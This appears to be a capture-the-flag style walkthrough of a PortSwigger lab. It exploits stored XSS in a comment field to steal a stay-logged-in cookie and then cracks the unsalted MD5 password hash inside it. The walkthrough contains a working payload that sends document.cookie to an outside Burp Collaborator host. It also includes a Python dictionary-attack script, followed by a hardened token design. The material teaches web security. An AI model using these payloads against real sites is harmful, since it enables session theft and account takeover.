Offline Password Cracking
Lab
Offline password cracking · Practitioner
Solution
Given
This lab stores the user's password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos's stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the "My account" page.
Your credentials: wiener:peter
Victim's username: carlos
Analyzing the task
The user's password hash is stored in a cookie. Using XSS on the comments page we need to steal the stay-logged-in cookie and then crack the password.
Recon
We log in as wiener and tick the "Remember me" box.
Then we go to the first article and look at the comments. We drop payloads into the comment text field and the name field:
<>'"COZ1-COMMENT
<>'"COZ1-NAME
Comment submitted. We hit "Back". We look at the server response:
<section class="comment">
<p>
<img src="/resources/images/avatarDefault.svg" class="avatar"> <>'"COZ1-NAME | 26 May 2026
</p>
<p><>'"COZ1-COMMENT</p>
<p></p>
</section>
So the comment text field is vulnerable to XSS, but the name field isn't — <>'" get escaped there.
Let's drop <script>alert(25)</script> then.
Works!
Now let's see what the stay-logged-in cookie looks like:
Set-Cookie: stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw; Expires=Wed, 01 Jan 3000 01:00:00 UTC
Set-Cookie: session=HYIyqq9WyhVgW2EBggmvYrFeFKNPkjHL; Secure; HttpOnly; SameSite=None
Good, no HttpOnly — we can steal it.
What to do with it next we'll figure out as we go; most likely we just look up the potential hash, an approach the PortSwigger docs mention.
What does the payload look like conceptually?
- Take document.cookie and send it to our server.
Let's grab a URL from Burp Collaborator:
awanmq3hu6caaaar36tu220suj0ao0cp.oastify.com
<script>fetch('https://awanmq3hu6caaaar36tu220suj0ao0cp.oastify.com/?c='+document.cookie)</script>
OK, got the victim's cookies:
GET /?c=secret=kMMSNa1CtoViZvGFdfkRGhrEmcaTkSLU;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
We pull out the stay-logged-in value in Burp Suite and base64-decode it.
We get Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz, which decodes to:
carlos:26323c16d5f4dabff3bb136f2460a943
Looks like an MD5 hash, just like in the previous lab.
Let's try to find the password for the MD5 hash 26323c16d5f4dabff3bb136f2460a943.
A dictionary attack, basically. Or some kind of hash database.
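As an added example (not part of the original writeup or of the PortSwigger lab code), the following script does the offline part of the lab in a few lines: it base64-decodes the stolen stay-logged-in value, splits it into username and MD5 hash, and runs a dictionary attack against the hash. The wordlist is constructed for the demonstration. It goes one step beyond the lab by also showing the design a server should use instead: the RememberMeStore class (an assumption, not anything in the lab) issues opaque random tokens and stores only their SHA-256 server-side, so a stolen cookie reveals nothing about the password and cannot be cracked offline.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Dict, Iterable, Optional, Tuple

# Cookie value captured in the lab; its format is base64(username:md5(password)).
STOLEN_COOKIE = "Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz"

# Constructed wordlist for the demonstration; a real attack would use a large list.
WORDLIST = ["password", "123456", "letmein", "onceuponatime", "qwerty"]


def decode_stay_logged_in(cookie: str) -> Tuple[str, str]:
    """Base64-decode the cookie and split it into (username, hex_hash)."""
    raw = base64.b64decode(cookie).decode()
    username, hex_hash = raw.split(":", 1)
    return username, hex_hash


def md5_hex(password: str) -> str:
    """Unsalted MD5 of the password, which is what the lab's cookie embeds."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: hash each candidate and compare.

    Because the hash is unsalted and fast, every guess costs one MD5 call,
    which is why this cookie design is broken.
    """
    target = target_hex.lower()
    for candidate in wordlist:
        if hmac.compare_digest(md5_hex(candidate), target):
            return candidate
    return None


class RememberMeStore:
    """Hardened counterpart (hypothetical): issue an opaque random token and
    keep only its SHA-256 server-side. The cookie then carries no information
    about the password, and a leaked token table cannot be replayed either."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}  # sha256(token) -> username

    @staticmethod
    def _fingerprint(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits of randomness
        self._tokens[self._fingerprint(token)] = username
        return token

    def lookup(self, token: str) -> Optional[str]:
        return self._tokens.get(self._fingerprint(token))

    def revoke(self, token: str) -> None:
        self._tokens.pop(self._fingerprint(token), None)


if __name__ == "__main__":
    user, digest = decode_stay_logged_in(STOLEN_COOKIE)
    print(f"user={user} md5={digest}")
    print("cracked:", crack_md5(digest, WORDLIST))
    store = RememberMeStore()
    tok = store.issue(user)
    print("opaque token resolves to:", store.lookup(tok))
```

Running the script decodes the cookie to carlos and the hash 26323c16d5f4dabff3bb136f2460a943, and the dictionary pass recovers the password. The same cookie issued by RememberMeStore would be a random string with nothing to crack, which is the fix the lab is really about.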
https://md5.gromweb.com/?md5=26323c16d5f4dabff3bb136f2460a943
There's a handy resource.
Password — onceuponatime.
We log in as the user and delete the account.
Lab solved!